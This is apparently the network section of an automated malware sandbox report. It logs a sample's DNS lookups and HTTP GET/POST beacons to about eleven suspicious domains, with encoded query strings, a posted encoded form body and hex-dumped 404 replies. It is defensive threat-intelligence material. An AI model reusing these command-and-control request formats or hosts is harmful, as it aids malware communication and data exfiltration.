            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /mxqs/?gHCXmDU=rHSAWCOTv0B2OyWbYMKwkuU+0pm+dYnzeuWywUFjfL0Y5nHDImWR+DkgzCKA2Uf76rKFoLo4oU5TM+FaPt+JwQr3UHywKVmmcKRjYyDIvIOI0clKCIXncFUG+d5lZOlczw==&Gh9=g8u8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dxeg.lolConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /ezjb/?gHCXmDU=l3Sp86LdHQK51JyE1bYSLRwrZz79eLj2OPa9S2eacvhOVgE1mplOojXymOZ9YDGfggwACbk9WjYrzuHmvoZIXyGwVLnNH3EmPti700Sf3mBkVqNnJJuO7TSqISvYzPtlzQ==&Gh9=g8u8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bqberw.vipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /0fox/?Gh9=g8u8&gHCXmDU=4CzKvyikl1JmGr8+CQf9WWAdO1Gj6lWNmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwJougsDrkF+FnKnugc/NP5deCT95MsghdxHCGfuWAxmiXjA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.weatherbook.liveConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /9apq/?gHCXmDU=LHjDDAx19xzpDFr0PiWSUWbLpibiWm2OcttpvXYQA3jhT8+aBAnUV8C6f3e3WqOmZ67HZ5Oe4rCfD6agN7j3kbNhxDE+C6RgPFZIWir2F/mXh+rIzbzvAjzVwKDU5y7xZw==&Gh9=g8u8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.cc101.proConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /66j2/?Gh9=g8u8&gHCXmDU=HppDh2G+RtpfmDCT0lrSNXbmIaO8PdTsBI8zXGv7BhGUw+IQzheJ3lftE5yUT4NGt8aZPQR/20xdb9u1HnRpXJ4mqLkzjkiMvvw05xDKhjbhyfyxEkkTngu+5afP1ml7ew== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dverkom.storeConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /8y34/?gHCXmDU=XU1sh1XtMideJdcsvQ849SwdzHfbiD52gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iI2BJEO7R6UftY8jdwwsPJfysQECRq1QA/MaERKdZHzC5fw==&Gh9=g8u8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.crowsecurity.cloudConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /kdfx/?gHCXmDU=eNDgnj/WfiIi0tdu+8aXiZOUK+7f3FxcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZQzsxT9MNlSdJwngJpwfGelD5vY9uXcKC+Fx9+CLw3WjCzw==&Gh9=g8u8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.multileveltravel.worldConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /ghvt/?gHCXmDU=LTjEQRzJtYpWLPC7D2gy6fienZfrxvC35gdjmmThy52R4q9H0AiUwAwLJzzKst3lsJoWNw2bCWGayp08MXQ4hrVkAG0NSKhN96qT0ct2vaZlIyhDhNk8pUo7hoK/rit8rQ==&Gh9=g8u8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.technectar.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /l8vr/?gHCXmDU=GUwa608LSzm8fYtcdeTRGyNyj51nBuUp00umbYRCm/TJjJxpSTDMONkqNmsHjnZjkXKqFncjqJIueqMvFavlXIaPeRkD7t3kPxbZ1SpX5GCbw23hlnYlJ0j4JxqETFq6pw==&Gh9=g8u8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficHTTP traffic detected: GET /5hcm/?gHCXmDU=tP3kAkfnE7i1YCC3akJDPtDOQtMjgFa5K3aSOloco8KmCG1xGxL66P/sVWpGfWTMdHJkfi3yOYhNMZMhorUklSdDj9q9dz65TNSy5hy/ttZPgJetaDNmb5haRLwL+/pH9A==&Gh9=g8u8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.bayarcepat19.clickConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
            Source: global trafficDNS traffic detected: DNS query: www.dxeg.lol
            Source: global trafficDNS traffic detected: DNS query: www.bqberw.vip
            Source: global trafficDNS traffic detected: DNS query: www.weatherbook.live
            Source: global trafficDNS traffic detected: DNS query: www.cc101.pro
            Source: global trafficDNS traffic detected: DNS query: www.dverkom.store
            Source: global trafficDNS traffic detected: DNS query: www.crowsecurity.cloud
            Source: global trafficDNS traffic detected: DNS query: www.multileveltravel.world
            Source: global trafficDNS traffic detected: DNS query: www.technectar.top
            Source: global trafficDNS traffic detected: DNS query: www.linkwave.cloud
            Source: global trafficDNS traffic detected: DNS query: www.bayarcepat19.click
            Source: global trafficDNS traffic detected: DNS query: www.queima.shop
            Source: unknownHTTP traffic detected: POST /ezjb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.bqberw.vipOrigin: http://www.bqberw.vipReferer: http://www.bqberw.vip/ezjb/Content-Length: 208Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)Data Raw: 67 48 43 58 6d 44 55 3d 6f 31 36 4a 2f 4f 48 53 65 51 4f 46 77 62 33 49 77 72 55 7a 46 56 73 61 5a 55 37 37 57 6f 53 62 41 49 54 6c 45 57 61 41 65 38 31 79 65 79 67 66 6b 4f 35 32 75 30 7a 6c 75 61 64 33 5a 77 36 30 6e 57 31 44 43 59 73 67 62 51 6f 76 79 76 4c 61 72 72 70 52 56 30 53 47 62 71 48 33 44 56 6b 39 4e 64 61 59 2f 6c 47 32 78 56 73 77 53 4b 45 63 42 75 48 65 34 53 48 51 46 30 66 50 32 75 59 78 6f 31 46 63 35 6c 32 45 69 72 64 56 4e 55 64 46 4d 55 42 56 6d 65 33 55 69 44 47 46 64 30 77 30 36 77 63 2b 61 54 55 33 44 37 71 2f 62 4b 48 41 46 38 61 6d 77 6d 61 43 77 47 6d 4a 43 2f 6b 54 37 2f 50 66 4e 78 73 3d Data Ascii: gHCXmDU=o16J/OHSeQOFwb3IwrUzFVsaZU77WoSbAITlEWaAe81yeygfkO52u0zluad3Zw60nW1DCYsgbQovyvLarrpRV0SGbqH3DVk9NdaY/lG2xVswSKEcBuHe4SHQF0fP2uYxo1Fc5l2EirdVNUdFMUBVme3UiDGFd0w06wc+aTU3D7q/bKHAF8amwmaCwGmJC/kT7/PfNxs=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Sep 2024 16:45:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Sep 2024 16:45:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Sep 2024 16:45:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Sep 2024 16:45:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:46:12 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:46:15 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 16:46:17 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 